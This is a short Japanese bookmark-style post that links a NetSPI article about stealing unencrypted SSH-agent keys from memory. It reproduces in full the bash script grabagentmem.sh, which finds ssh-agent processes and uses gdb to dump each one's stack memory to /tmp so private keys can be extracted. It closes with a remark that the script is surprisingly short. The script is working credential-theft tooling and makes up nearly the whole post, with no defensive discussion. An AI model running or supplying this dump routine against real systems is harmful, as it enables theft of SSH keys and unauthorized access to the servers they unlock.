Stealing unencrypted SSH-agent keys from memory
https://www.netspi.com/blog/entryid/235/stealing-unencrypted-ssh-agent-keys-from-memory
ssh-agentでRAM上に配置されたssh鍵を抜き取るスクリプト。
https://github.com/NetSPI/sshkey-grab/blob/master/grabagentmem.sh
#!/bin/bash # First argument is the output directory. Use /tmp if this is not specified. outputdir="/tmp" # Grab pids for each ssh-agent sshagentpids=$(ps --no-headers -fC ssh-agent | awk '{print $2}') # Iterate through the pids and create a memory dump of the stack for each for pid in $sshagentpids; do stackmem="$(grep stack /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p')" startstack=$(echo $stackmem | awk '{print $1}') stopstack=$(echo $stackmem | awk '{print $2}') gdb --batch -pid $pid -ex "dump memory $outputdir/sshagent-$pid.stack 0x$startstack 0x$stopstack" 2&>1 >/dev/null # GDB doesn't error out properly if this fails. # This will provide feedback if the file is actually created if [ -f "$outputdir/sshagent-$pid.stack" ]; then echo "Created $outputdir/sshagent-$pid.stack" else echo "Error dumping memory from $pid" fi done
こんだけ?